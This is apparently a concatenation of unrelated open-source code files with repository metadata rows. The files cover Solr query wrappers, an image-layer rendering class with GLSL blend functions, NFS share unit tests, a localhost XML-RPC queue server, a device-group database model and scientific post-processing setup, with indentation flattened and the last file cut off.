for n, nh in g_hash_weighted.node.iteritems():
node_text = (n[0].split("/")[-1] + n[1] + "\n" +
str(g_hash_weighted.node[n]["label"]))
g_hash_weighted.node[n]["label"] = node_text
else:
for n, nh in g_hash_weighted.node.iteritems():
g_hash_weighted.node[n]["label"] = ""
return g_hash_weighted
def normalize_weights(a, imin=0.0, imax=1.0):
dmin = a.min()
dmax = a.max()
return imin + (imax - imin) * (a - dmin) / (dmax - dmin)
def read_files(d, file_extension, max_files=0):
files = []
for fn in os.listdir(d):
if fn.lower().endswith(file_extension):
files.append(os.path.join(d, fn))
shuffle(files)
# if max_files is 0, return all the files in dir
if max_files == 0:
max_files = len(files)
files = files[:max_files]
return files
| gpl-2.0 | -6,568,646,348,829,557,000 | 32.912371 | 89 | 0.573035 | false | 3.540904 | false | false | false |
voutilad/courtlistener | cl/lib/scorched_utils.py | 1 | 2383 | from scorched import SolrInterface
from scorched.search import Options, SolrSearch
class ExtraSolrInterface(SolrInterface):
"""Extends the SolrInterface class so that it uses the ExtraSolrSearch
class.
"""
def __init__(self, *args, **kwargs):
super(ExtraSolrInterface, self).__init__(*args, **kwargs)
def query(self, *args, **kwargs):
"""
:returns: SolrSearch -- A solrsearch.
Build a solr query
"""
# Change this line to hit our class instead of SolrSearch. All the rest
# of this class is the same.
q = ExtraSolrSearch(self)
if len(args) + len(kwargs) > 0:
return q.query(*args, **kwargs)
else:
return q
class ExtraSolrSearch(SolrSearch):
"""Base class for common search options management"""
option_modules = ('query_obj', 'filter_obj', 'paginator',
'more_like_this', 'highlighter', 'postings_highlighter',
'faceter', 'grouper', 'sorter', 'facet_querier',
'debugger', 'spellchecker', 'requesthandler',
'field_limiter', 'parser', 'pivoter', 'facet_ranger',
'term_vectors', 'stat', 'extra')
def _init_common_modules(self):
super(ExtraSolrSearch, self)._init_common_modules()
self.extra = ExtraOptions()
def add_extra(self, **kwargs):
newself = self.clone()
newself.extra.update(kwargs)
return newself
_count = None
def count(self):
if self._count is None:
# We haven't gotten the count yet. Get it. Clone self for this
# query or else we'll set rows=0 for remainder.
newself = self.clone()
r = newself.add_extra(rows=0).execute()
if r.groups:
total = getattr(r.groups, r.group_field)['ngroups']
else:
total = r.result.numFound
# Set the cache
self._count = total
return self._count
class ExtraOptions(Options):
def __init__(self, original=None):
if original is None:
self.option_dict = {}
else:
self.option_dict = original.option_dict.copy()
def update(self, extra_options):
self.option_dict.update(extra_options)
def options(self):
return self.option_dict
| agpl-3.0 | -1,908,037,165,999,588,600 | 31.202703 | 79 | 0.571129 | false | 3.98495 | false | false | false |
zpincus/RisWidget | ris_widget/layer.py | 1 | 17002 | # This code is licensed under the MIT License (see LICENSE file for details)
from PyQt5 import Qt
import textwrap
import warnings
import numpy
from . import image
from . import histogram
from . import qt_property
from . import async_texture
SHADER_PROP_HELP = """The GLSL fragment shader used to render an image within a layer stack is created
by filling in the $-values from the following template (somewhat simplified) with the corresponding
attributes of the layer. A template for layer in the stack is filled in and the
final shader is the the concatenation of all the templates.
NB: In case of error, calling del on the layer attribute causes it to revert to the default value.
// Simplified GLSL shader code:
// Below repeated for each layer
uniform sampler2D tex;
vec4 color_transform(vec4 in_, vec4 tint, float rescale_min, float rescale_range, float gamma_scalar)
{
vec4 out_;
out_.a = in_.a;
vec3 gamma = vec3(gamma_scalar, gamma_scalar, gamma_scalar);
${transform_section}
// default value for transform_section:
// out_.rgb = pow(clamp((in_.rgb - rescale_min) / (rescale_range), 0.0f, 1.0f), gamma); out_.rgba *= tint;
return clamp(out_, 0, 1);
}
s = texture2D(tex, tex_coord);
s = color_transform(
${getcolor_expression}, // default getcolor_expression for a grayscale image is: vec4(s.rrr, 1.0f)
${tint}, // [0,1] normalized RGBA component values that scale results of getcolor_expression
rescale_min, // [0,1] scaled version of layer.min
rescale_range, // [0,1] scaled version of layer.max - layer.min
${gamma});
sca = s.rgb * s.a;
${Layer.BLEND_FUNCTIONS[${blend_function}]}
da = clamp(da, 0, 1);
dca = clamp(dca, 0, 1);
// end per-layer repeat
gl_FragColor = vec4(dca / da, da * layer_stack_item_opacity);"""
def coerce_to_str(v):
return '' if v is None else str(v)
def coerce_to_tint(v):
v = tuple(map(float, v))
if len(v) not in (3,4) or not all(map(lambda v_: 0 <= v_ <= 1, v)):
raise ValueError('The iteraterable assigned to tint must represent 3 or 4 real numbers in the interval [0, 1].')
if len(v) == 3:
v += (1.0,)
return v
def coerce_to_radius(v):
if v == '' or v is None:
return None
else:
v = float(v)
if v <= 0:
raise ValueError('Radius must be positive')
if v > 0.707:
v = None # larger radius and image is un-masked...
return v
class Layer(qt_property.QtPropertyOwner):
""" The class Layer contains properties that control Image presentation.
Properties:
visible
mask_radius
auto_min_max
min
max
gamma
histogram_min
histogram_max
getcolor_expression
tint
transform_section
blend_function
opacity
The 'changed' signal is emitted when any property impacting image presentation
is modified or image data is explicitly changed or refreshed. Each specific
property also has its own changed signal, such as 'min_changed' &c.
"""
GAMMA_RANGE = (0.0625, 16.0)
IMAGE_TYPE_TO_GETCOLOR_EXPRESSION = {
'G' : 'vec4(s.rrr, 1.0f)',
'Ga' : 'vec4(s.rrr, s.g)',
'rgb' : 'vec4(s.rgb, 1.0f)',
'rgba': 's'}
DEFAULT_TRANSFORM_SECTION = 'out_.rgb = pow(clamp((in_.rgb - rescale_min) / (rescale_range), 0.0f, 1.0f), gamma); out_.rgba *= tint;'
# Blend functions adapted from http://dev.w3.org/SVG/modules/compositing/master/
BLEND_FUNCTIONS = {
'normal' : ('dca = sca + dca * (1.0f - s.a);', # AKA src-over
'da = s.a + da - s.a * da;'),
'multiply' : ('dca = sca * dca + sca * (1.0f - da) + dca * (1.0f - s.a);',
'da = s.a + da - s.a * da;'),
'screen' : ('dca = sca + dca - sca * dca;',
'da = s.a + da - s.a * da;'),
'overlay' : ('isa = 1.0f - s.a; osa = 1.0f + s.a;',
'ida = 1.0f - da; oda = 1.0f + da;',
'sada = s.a * da;',
'for(i = 0; i < 3; ++i){',
' dca[i] = (dca[i] + dca[i] <= da) ?',
' (sca[i] + sca[i]) * dca[i] + sca[i] * ida + dca[i] * isa :',
' sca[i] * oda + dca[i] * osa - (dca[i] + dca[i]) * sca[i] - sada;}',
'da = s.a + da - sada;'),
# 'src' : ('dca = sca;',
# 'da = s.a;'),
# 'dst-over' : ('dca = dca + sca * (1.0f - da);',
# 'da = s.a + da - s.a * da;'),
# 'plus' : ('dca += sca;',
# 'da += s.a;'),
# 'difference':('dca = (sca * da + dca * s.a - (sca + sca) * dca) + sca * (1.0f - da) + dca * (1.0f - s.a);',
# 'da = s.a + da - s.a * da;')
}
for k, v in BLEND_FUNCTIONS.items():
BLEND_FUNCTIONS[k] = ' // blending function name: {}\n '.format(k) + '\n '.join(v)
del k, v
# A change to any mutable property, including .image, potentially impacts layer presentation. For convenience, .changed is emitted whenever
# any mutable-property-changed signal is emitted, including or calling .image.refresh(). Note that the .changed signal is emitted by
# the qt_property.Property instance (which involves some deep-ish Python magic)
# NB: .image_changed is the more specific signal emitted in addition to .changed for modifications to .image.
#
changed = Qt.pyqtSignal(object)
image_changed = Qt.pyqtSignal(object)
opacity_changed = Qt.pyqtSignal(object)
# below properties are necessary for proper updating of LayerStack table view when images change
dtype_changed = Qt.pyqtSignal(object)
type_changed = Qt.pyqtSignal(object)
size_changed = Qt.pyqtSignal(object)
name_changed = Qt.pyqtSignal(object)
def __init__(self, image=None, parent=None):
self._retain_auto_min_max_on_min_max_change = False
self._image = None
super().__init__(parent)
self.image_changed.connect(self.changed)
if image is not None:
self.image = image
else:
# self._image is already None, so setting self.image = None will just
# return immediately from the setter, without setting the below.
self.dtype = None
self.type = None
self.size = None
self.name = None
def __repr__(self):
image = self.image
return '{}; {}image={}>'.format(
super().__repr__()[:-1],
'visible=False, ' if not self.visible else '',
'None' if image is None else image.__repr__())
@classmethod
def from_savable_properties_dict(cls, prop_dict):
ret = cls()
for pname, pval, in prop_dict.items():
setattr(ret, pname, pval)
return ret
def get_savable_properties_dict(self):
ret = {name : prop.__get__(self) for name, prop in self._properties.items() if not prop.is_default(self)}
return ret
@property
def image(self):
return self._image
@image.setter
def image(self, new_image):
if new_image is self._image:
return
if new_image is not None:
if not isinstance(new_image, image.Image):
new_image = image.Image(new_image)
try:
new_image.changed.connect(self._on_image_changed)
except Exception as e:
if self._new_image is not None:
self._new_image.changed.disconnect(self._on_image_changed)
self._image = None
raise e
if self._image is not None:
# deallocate old texture when we're done with it.
self._image.texture.destroy()
self._image.changed.disconnect(self._on_image_changed)
self._image = new_image
if new_image is None:
self.dtype = None
self.type = None
self.size = None
self.name = None
else:
min, max = new_image.valid_range
if not (min <= self.histogram_min <= max):
del self.histogram_min # reset histogram min (delattr on the qt_property returns it to the default)
if not (min <= self.histogram_max <= max):
del self.histogram_max # reset histogram min (delattr on the qt_property returns it to the default)
self.dtype = new_image.data.dtype
self.type = new_image.type
self.size = new_image.size
self.name = new_image.name
for proxy_prop in ('dtype', 'type', 'size', 'name'):
getattr(self, proxy_prop+'_changed').emit(self)
self._on_image_changed()
def _on_image_changed(self, changed_region=None):
if self.image is not None:
# upload texture before calculating the histogram, so that the background texture upload (slow) runs in
# parallel with the foreground histogram calculation (slow)
self.image.texture.upload(changed_region)
self.calculate_histogram()
self._update_property_defaults()
if self.image is not None:
if self.auto_min_max:
self.do_auto_min_max()
else:
l, h = self.image.valid_range
if self.min < l:
self.min = l
if self.max > h:
self.max = h
self.image_changed.emit(self)
def calculate_histogram(self):
r_min = None if self._is_default('histogram_min') else self.histogram_min
r_max = None if self._is_default('histogram_max') else self.histogram_max
self.image_min, self.image_max, self.histogram = histogram.histogram(
self.image.data, (r_min, r_max), self.image.image_bits, self.mask_radius)
def generate_contextual_info_for_pos(self, x, y, idx=None):
if self.image is None:
return None
else:
image_text = self.image.generate_contextual_info_for_pos(x, y)
if image_text is None:
return None
if idx is not None:
image_text = '{}: {}'.format(idx, image_text)
return image_text
def do_auto_min_max(self):
assert self.image is not None
self._retain_auto_min_max_on_min_max_change = True
try:
self.min = max(self.image_min, self.histogram_min)
self.max = min(self.image_max, self.histogram_max)
finally:
self._retain_auto_min_max_on_min_max_change = False
visible = qt_property.Property(
default_value=True,
coerce_arg_fn=bool)
def _mask_radius_post_set(self, v):
self._on_image_changed()
mask_radius = qt_property.Property(
default_value=None,
coerce_arg_fn=coerce_to_radius,
post_set_callback=_mask_radius_post_set)
def _auto_min_max_post_set(self, v):
if v and self.image is not None:
self.do_auto_min_max()
auto_min_max = qt_property.Property(
default_value=False,
coerce_arg_fn=bool,
post_set_callback=_auto_min_max_post_set)
def _min_default(self):
if self.image is None:
return 0.0
else:
return self._histogram_min_default()
def _max_default(self):
if self.image is None:
return 65535.0
else:
return self._histogram_max_default()
def _min_max_pre_set(self, v):
if self.image is not None:
l, h = self.image.valid_range
if not l <= v <= h:
warnings.warn('min/max values for this image must be in the closed interval [{}, {}].'.format(*r))
return False
def _min_post_set(self, v):
if v > self.max:
self.max = v
if not self._retain_auto_min_max_on_min_max_change:
self.auto_min_max = False
def _max_post_set(self, v):
if v < self.min:
self.min = v
if not self._retain_auto_min_max_on_min_max_change:
self.auto_min_max = False
min = qt_property.Property(
default_value=_min_default,
coerce_arg_fn=float,
pre_set_callback=_min_max_pre_set,
post_set_callback =_min_post_set)
max = qt_property.Property(
default_value=_max_default,
coerce_arg_fn=float,
pre_set_callback=_min_max_pre_set,
post_set_callback=_max_post_set)
def _gamma_pre_set(self, v):
r = self.GAMMA_RANGE
if not r[0] <= v <= r[1]:
warnings.warn('gamma value must be in the closed interval [{}, {}].'.format(*r))
return False
gamma = qt_property.Property(
default_value=1.0,
coerce_arg_fn=float,
pre_set_callback=_gamma_pre_set)
def _histogram_min_default(self):
if self.image is None:
return 0.0
elif self.dtype == numpy.float32:
return self.image_min
else:
return float(self.image.valid_range[0])
def _histogram_max_default(self):
if self.image is None:
return 65535.0
elif self.dtype == numpy.float32:
return self.image_max
else:
return float(self.image.valid_range[1])
def _histogram_min_pre_set(self, v):
l, h = (0, 65535.0) if self.image is None else self.image.valid_range
if not l <= v <= h:
warnings.warn('histogram_min value must be in [{}, {}].'.format(l, h))
return False
if v >= self.histogram_max:
warnings.warn('histogram_min must be less than histogram_max.')
return False
def _histogram_max_pre_set(self, v):
l, h = (0, 65535.0) if self.image is None else self.image.valid_range
if not l <= v <= h:
warnings.warn('histogram_max value must be in [{}, {}].'.format(l, h))
return False
if v <= self.histogram_min:
warnings.warn('histogram_max must be greater than histogram_min.')
return False
def _histogram_min_max_post_set(self, v):
if self.image is not None:
self.calculate_histogram()
self._retain_auto_min_max_on_min_max_change = True
try:
if self.min < self.histogram_min:
self.min = self.histogram_min
if self.max > self.histogram_max:
self.max = self.histogram_max
finally:
self._retain_auto_min_max_on_min_max_change = False
if self.image is not None and self.auto_min_max:
self.do_auto_min_max()
histogram_min = qt_property.Property(
default_value=_histogram_min_default,
coerce_arg_fn=float,
pre_set_callback=_histogram_min_pre_set,
post_set_callback=_histogram_min_max_post_set)
histogram_max = qt_property.Property(
default_value=_histogram_max_default,
coerce_arg_fn=float,
pre_set_callback=_histogram_max_pre_set,
post_set_callback=_histogram_min_max_post_set)
def _getcolor_expression_default(self):
image = self.image
if image is None:
return ''
else:
return self.IMAGE_TYPE_TO_GETCOLOR_EXPRESSION[image.type]
getcolor_expression = qt_property.Property(
default_value=_getcolor_expression_default,
coerce_arg_fn=coerce_to_str,
doc=SHADER_PROP_HELP)
def _tint_pre_set(self, v):
if self.tint[3] != v:
self.opacity_changed.emit(self)
tint = qt_property.Property(
default_value=(1.0, 1.0, 1.0, 1.0),
coerce_arg_fn=coerce_to_tint,
pre_set_callback=_tint_pre_set,
doc = SHADER_PROP_HELP)
transform_section = qt_property.Property(
default_value=DEFAULT_TRANSFORM_SECTION,
coerce_arg_fn=coerce_to_str,
doc=SHADER_PROP_HELP)
def _blend_function_pre_set(self, v):
if v not in self.BLEND_FUNCTIONS:
raise ValueError('The string assigned to blend_function must be one of:\n' + '\n'.join("'" + s + "'" for s in sorted(self.BLEND_FUNCTIONS.keys())))
blend_function = qt_property.Property(
default_value='screen',
coerce_arg_fn=str,
pre_set_callback=_blend_function_pre_set,
doc=SHADER_PROP_HELP + '\n\nSupported blend_functions:\n ' + '\n '.join("'" + s + "'" for s in sorted(BLEND_FUNCTIONS.keys())))
@property
def opacity(self):
return self.tint[3]
@opacity.setter
def opacity(self, v):
v = float(v)
if not 0 <= v <= 1:
raise ValueError('The value assigned to opacity must be a real number in the interval [0, 1].')
t = list(self.tint)
t[3] = v
self.tint = t #NB: tint takes care of emitting opacity_changed
| mit | -6,145,258,606,754,030,000 | 36.449339 | 159 | 0.566404 | false | 3.583895 | false | false | false |
emc-openstack/storops | storops_test/vnx/resource/test_nfs_share.py | 1 | 6687 | # coding=utf-8
# Copyright (c) 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
import unittest
from hamcrest import assert_that, has_item, raises
from hamcrest import equal_to
from storops_test.vnx.nas_mock import t_nas, patch_nas
from storops.exception import VNXBackendError
from storops.vnx.resource.mover import VNXMover
from storops.vnx.resource.nfs_share import NfsHostConfig, VNXNfsShare
__author__ = 'Jay Xu'
class VNXNfsShareTest(unittest.TestCase):
@patch_nas
def test_get_all_share(self):
shares = VNXNfsShare.get(t_nas())
assert_that(len(shares), equal_to(26))
share = next(s for s in shares if s.path == '/EEE')
self.verify_share_eee(share)
@patch_nas(xml_output='abc.xml')
def test_get_share_by_path_empty(self):
def f():
path = '/EEE'
shares = VNXNfsShare.get(t_nas(), path=path)
assert_that(len(shares), equal_to(1))
assert_that(f, raises(IOError))
@patch_nas
def test_get_share_by_path_success(self):
path = '/EEE'
shares = VNXNfsShare.get(t_nas(), path=path)
assert_that(len(shares), equal_to(1))
share = next(s for s in shares if s.path == path)
self.verify_share_eee(share)
@patch_nas
def test_get_share_by_mover_id(self):
mover = self.get_mover_1()
shares = VNXNfsShare.get(t_nas(), mover=mover)
assert_that(len(shares), equal_to(24))
share = next(s for s in shares if s.path == '/EEE')
self.verify_share_eee(share)
@staticmethod
def verify_share_eee(share):
assert_that(share.path, equal_to('/EEE'))
assert_that(share.read_only, equal_to(False))
assert_that(share.fs_id, equal_to(213))
assert_that(share.mover_id, equal_to(1))
assert_that(len(share.root_hosts), equal_to(41))
assert_that(share.access_hosts, has_item('10.110.43.94'))
assert_that(len(share.access_hosts), equal_to(41))
assert_that(share.access_hosts, has_item('10.110.43.94'))
assert_that(len(share.rw_hosts), equal_to(41))
assert_that(share.rw_hosts, has_item('10.110.43.94'))
assert_that(len(share.ro_hosts), equal_to(41))
assert_that(share.ro_hosts, has_item('10.110.43.94'))
@patch_nas
def test_modify_not_exists(self):
def f():
host_config = NfsHostConfig(
root_hosts=['1.1.1.1', '2.2.2.2'],
ro_hosts=['3.3.3.3'],
rw_hosts=['4.4.4.4', '5.5.5.5'],
access_hosts=['6.6.6.6'])
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/not_found')
share.modify(ro=False, host_config=host_config)
assert_that(f, raises(VNXBackendError, 'does not exist'))
@patch_nas
def test_modify_success(self):
host_config = NfsHostConfig(access_hosts=['7.7.7.7'])
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/EEE')
resp = share.modify(ro=True, host_config=host_config)
assert_that(resp.is_ok(), equal_to(True))
@patch_nas
def test_create_no_host(self):
def f():
mover = self.get_mover_1()
VNXNfsShare.create(cli=t_nas(), mover=mover, path='/invalid')
assert_that(f, raises(VNXBackendError, 'is invalid'))
@patch_nas
def test_create_success(self):
mover = self.get_mover_1()
share = VNXNfsShare.create(cli=t_nas(), mover=mover, path='/EEE')
assert_that(share.path, equal_to('/EEE'))
assert_that(share.mover_id, equal_to(1))
assert_that(share.existed, equal_to(True))
assert_that(share.fs_id, equal_to(243))
@patch_nas
def test_create_with_host_config(self):
mover = self.get_mover_1()
host_config = NfsHostConfig(
root_hosts=['1.1.1.1', '2.2.2.2'],
ro_hosts=['3.3.3.3'],
rw_hosts=['4.4.4.4', '5.5.5.5'],
access_hosts=['6.6.6.6'])
share = VNXNfsShare.create(cli=t_nas(), mover=mover, path='/FFF',
host_config=host_config)
assert_that(share.fs_id, equal_to(247))
assert_that(share.path, equal_to('/FFF'))
assert_that(share.existed, equal_to(True))
assert_that(share.access_hosts, has_item('6.6.6.6'))
@patch_nas
def test_delete_success(self):
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/EEE')
resp = share.delete()
assert_that(resp.is_ok(), equal_to(True))
@patch_nas
def test_delete_not_found(self):
def f():
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/not_found')
share.delete()
assert_that(f, raises(VNXBackendError, 'Invalid argument'))
@staticmethod
def get_mover_1():
return VNXMover(mover_id=1, cli=t_nas())
@patch_nas
def test_mover_property(self):
mover = self.get_mover_1()
share = VNXNfsShare.get(cli=t_nas(), mover=mover, path='/EEE')
mover = share.mover
assert_that(mover.existed, equal_to(True))
assert_that(mover.role, equal_to('primary'))
@patch_nas
def test_fs_property(self):
mover = self.get_mover_1()
share = VNXNfsShare.get(cli=t_nas(), mover=mover, path='/EEE')
fs = share.fs
assert_that(fs.existed, equal_to(True))
assert_that(fs.fs_id, equal_to(243))
@patch_nas
def test_allow_ro_hosts(self):
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/minjie_fs1')
resp = share.allow_ro_access('1.1.1.1', '2.2.2.2')
assert_that(resp.is_ok(), equal_to(True))
@patch_nas
def test_deny_hosts(self):
mover = self.get_mover_1()
share = VNXNfsShare(cli=t_nas(), mover=mover, path='/minjie_fs2')
resp = share.deny_access('1.1.1.1', '2.2.2.2')
assert_that(resp.is_ok(), equal_to(True))
| apache-2.0 | 4,224,096,191,783,860,000 | 35.944751 | 78 | 0.600568 | false | 3.042311 | true | false | false |
TheGentlemanOctopus/thegentlemanoctopus | octopus_code/core/octopus/rpcServer.py | 1 | 2481 | #!/usr/bin/env python
import threading
import Queue
import time
from SimpleXMLRPCServer import SimpleXMLRPCServer
from SimpleXMLRPCServer import SimpleXMLRPCRequestHandler
import xmlrpclib
rpc_path = '/RPC2'
# The RPC server listens at host:port/rpc_path
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = (rpc_path,)
class RpcServer(threading.Thread):
def __init__(self, dataQueue=1, host='127.0.0.1', port=8000):
self.host = host
self.port = port
#Initialise the thread
threading.Thread.__init__(self)
# Python warns about file locking and such with daemon threads
# but we are not using any resources like that here
# https://docs.python.org/2/library/threading.html#thread-objects
self.daemon = True
self.server = SimpleXMLRPCServer((host, port),
requestHandler=RequestHandler,
logRequests=False
)
self.server.register_function(self.put)
# TODO: 1000 should be more than enough, but we should make sure,
# Annoying! LIFO queue's don't have a clear
self.queue = Queue.Queue(1000)
def run(self):
self.server.serve_forever()
# Request data is expected to be a dictionary since
# only simple data types can be serialized over xmlrpc (python objects cannot)
# See: http://www.tldp.org/HOWTO/XML-RPC-HOWTO/xmlrpc-howto-intro.html#xmlrpc-howto-types
def put(self, requestData):
with self.queue.mutex:
self.queue.queue.clear()
self.queue.put(requestData)
if self.queue.full():
print "WARNING! Max data queue limit reached: " + str(self.queue.qsize())
#Echo for now
return requestData
def url(self):
return "http://%s:%i%s" % (self.host, self.port, rpc_path)
#LIFO get
def get(self):
with self.queue.mutex:
item = self.queue.queue[-1]
self.queue.queue.clear()
return item
# Example
if __name__ == '__main__':
# Run the Rpc server on a new thread
rpc_server = RpcServer()
print "Running XML-RPC server at " + rpc_server.url()
rpc_server.start()
# Make a client
s = xmlrpclib.ServerProxy(rpc_server.url())
# Echo
count=0
while True:
s.put({"x": count})
count += 1
if not rpc_server.queue.empty():
print "Item received: " + str(rpc_server.queue.get())
time.sleep(3)
| gpl-3.0 | 584,448,511,133,125,900 | 27.517241 | 93 | 0.626763 | false | 3.846512 | false | false | false |
dhocker/athomepowerlineserver | database/action_group_devices.py | 1 | 3254 | # -*- coding: utf-8 -*-
#
# AtHomePowerlineServer
# Copyright © 2020 Dave Hocker
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# See the LICENSE file for more details.
#
#
# Programs table model
#
from database.AtHomePowerlineServerDb import AtHomePowerlineServerDb
from .base_table import BaseTable
class ActionGroupDevices(BaseTable):
def __init__(self):
pass
def get_group_devices(self, group_id):
self.clear_last_error()
conn = None
try:
conn = AtHomePowerlineServerDb.GetConnection()
c = AtHomePowerlineServerDb.GetCursor(conn)
# The results are sorted based on the most probable use
rset = c.execute(
"SELECT * from ManagedDevices "
"JOIN ActionGroupDevices ON ActionGroupDevices.group_id=:group_id "
"WHERE ManagedDevices.id=ActionGroupDevices.device_id", {"group_id": group_id}
)
result = ActionGroupDevices.rows_to_dict_list(rset)
except Exception as ex:
self.set_last_error(ActionGroupDevices.SERVER_ERROR, str(ex))
result = None
finally:
# Make sure connection is closed
if conn is not None:
conn.close()
return result
def insert_device(self, group_id, device_id):
"""
Insert a group device record
:param group_id: The containing group ID
:param device_id: The devid ID being added to the group
:return:
"""
self.clear_last_error()
conn = None
try:
conn = AtHomePowerlineServerDb.GetConnection()
c = AtHomePowerlineServerDb.GetCursor(conn)
c.execute(
"INSERT INTO ActionGroupDevices (group_id,device_id) values (?,?)",
(group_id, device_id)
)
conn.commit()
# Get id of inserted record
id = c.lastrowid
except Exception as ex:
self.set_last_error(ActionGroupDevices.SERVER_ERROR, str(ex))
id = None
finally:
# Make sure connection is closed
if conn is not None:
conn.close()
return id
def delete_device(self, group_id, device_id):
self.clear_last_error()
conn = None
try:
conn = AtHomePowerlineServerDb.GetConnection()
c = AtHomePowerlineServerDb.GetCursor(conn)
# The results are sorted based on the most probable use
c.execute(
"DELETE FROM ActionGroupDevices WHERE group_id=:group_id AND device_id=:device_id",
{"group_id": group_id, "device_id": device_id}
)
conn.commit()
change_count = conn.total_changes
except Exception as ex:
self.set_last_error(ActionGroupDevices.SERVER_ERROR, str(ex))
change_count = 0
finally:
# Make sure connection is closed
if conn is not None:
conn.close()
return change_count
| gpl-3.0 | 4,163,177,689,781,883,000 | 30.892157 | 99 | 0.584384 | false | 4.224675 | false | false | false |
Carralex/landlab | landlab/plot/tests/test_event_handler.py | 1 | 1185 | #! /usr/bin/env python
"""
Created on Thu Jun 29 11:02:28 2017
@author: njlyons
"""
from landlab import imshow_grid, RasterModelGrid
from landlab.plot.event_handler import query_grid_on_button_press
from matplotlib.pyplot import gcf
from matplotlib.backend_bases import Event
from numpy.testing import assert_equal
def test_query_grid_on_button_press():
rmg = RasterModelGrid((5, 5))
imshow_grid(rmg, rmg.nodes, cmap='RdYlBu')
# Programmatically create an event near the grid center.
event = Event('simulated_event', gcf().canvas)
event.xdata = int(rmg.number_of_node_columns * 0.5)
event.ydata = int(rmg.number_of_node_rows * 0.5)
results = query_grid_on_button_press(event, rmg)
x_coord = results['grid location']['x_coord']
y_coord = results['grid location']['x_coord']
msg = 'Items: Simulated matplotlib event and query results.'
assert_equal(x_coord, event.xdata, msg)
assert_equal(y_coord, event.ydata, msg)
msg = 'Items: Node ID and grid coordinates of simulated matplotlib event.'
node = rmg.grid_coords_to_node_id(event.xdata, event.ydata)
assert_equal(results['node']['ID'], node, msg)
| mit | 5,975,126,253,596,191,000 | 32.857143 | 78 | 0.692827 | false | 3.211382 | false | false | false |
chichilalescu/bfps | bfps/PP.py | 1 | 37051 | #######################################################################
# #
# Copyright 2015 Max Planck Institute #
# for Dynamics and Self-Organization #
# #
# This file is part of bfps. #
# #
# bfps is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published #
# by the Free Software Foundation, either version 3 of the License, #
# or (at your option) any later version. #
# #
# bfps is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with bfps. If not, see <http://www.gnu.org/licenses/> #
# #
# Contact: [email protected] #
# #
#######################################################################
import os
import sys
import shutil
import subprocess
import argparse
import h5py
import math
import numpy as np
import warnings
import bfps
from ._code import _code
from bfps import tools
class PP(_code):
"""This class is meant to stitch together the C++ code into a final source file,
compile it, and handle all job launching.
"""
def __init__(
self,
work_dir = './',
simname = 'test'):
_code.__init__(
self,
work_dir = work_dir,
simname = simname)
self.host_info = {'type' : 'cluster',
'environment' : None,
'deltanprocs' : 1,
'queue' : '',
'mail_address': '',
'mail_events' : None}
self.generate_default_parameters()
return None
def set_precision(
self,
fluid_dtype):
if fluid_dtype in [np.float32, np.float64]:
self.fluid_dtype = fluid_dtype
elif fluid_dtype in ['single', 'double']:
if fluid_dtype == 'single':
self.fluid_dtype = np.dtype(np.float32)
elif fluid_dtype == 'double':
self.fluid_dtype = np.dtype(np.float64)
self.rtype = self.fluid_dtype
if self.rtype == np.float32:
self.ctype = np.dtype(np.complex64)
self.C_field_dtype = 'float'
self.fluid_precision = 'single'
elif self.rtype == np.float64:
self.ctype = np.dtype(np.complex128)
self.C_field_dtype = 'double'
self.fluid_precision = 'double'
return None
def write_src(self):
self.version_message = (
'/***********************************************************************\n' +
'* this code automatically generated by bfps\n' +
'* version {0}\n'.format(bfps.__version__) +
'***********************************************************************/\n\n\n')
self.include_list = [
'"base.hpp"',
'"scope_timer.hpp"',
'"fftw_interface.hpp"',
'"full_code/main_code.hpp"',
'<cmath>',
'<iostream>',
'<hdf5.h>',
'<string>',
'<cstring>',
'<fftw3-mpi.h>',
'<omp.h>',
'<cfenv>',
'<cstdlib>',
'"full_code/{0}.hpp"\n'.format(self.dns_type)]
self.main = """
int main(int argc, char *argv[])
{{
bool fpe = (
(getenv("BFPS_FPE_OFF") == nullptr) ||
(getenv("BFPS_FPE_OFF") != std::string("TRUE")));
return main_code< {0} >(argc, argv, fpe);
}}
""".format(self.dns_type + '<{0}>'.format(self.C_field_dtype))
self.includes = '\n'.join(
['#include ' + hh
for hh in self.include_list])
with open(self.name + '.cpp', 'w') as outfile:
outfile.write(self.version_message + '\n\n')
outfile.write(self.includes + '\n\n')
outfile.write(self.main + '\n')
return None
def generate_default_parameters(self):
# these parameters are relevant for all PP classes
self.parameters['dealias_type'] = int(1)
self.parameters['dkx'] = float(1.0)
self.parameters['dky'] = float(1.0)
self.parameters['dkz'] = float(1.0)
self.parameters['nu'] = float(0.1)
self.parameters['fmode'] = int(1)
self.parameters['famplitude'] = float(0.5)
self.parameters['fk0'] = float(2.0)
self.parameters['fk1'] = float(4.0)
self.parameters['forcing_type'] = 'linear'
self.pp_parameters = {}
self.pp_parameters['iteration_list'] = np.zeros(1).astype(np.int)
return None
def extra_postprocessing_parameters(
self,
dns_type = 'joint_acc_vel_stats'):
pars = {}
if dns_type == 'joint_acc_vel_stats':
pars['max_acceleration_estimate'] = float(10)
pars['max_velocity_estimate'] = float(1)
pars['histogram_bins'] = int(129)
return pars
def get_data_file_name(self):
return os.path.join(self.work_dir, self.simname + '.h5')
def get_data_file(self):
return h5py.File(self.get_data_file_name(), 'r')
def get_particle_file_name(self):
return os.path.join(self.work_dir, self.simname + '_particles.h5')
def get_particle_file(self):
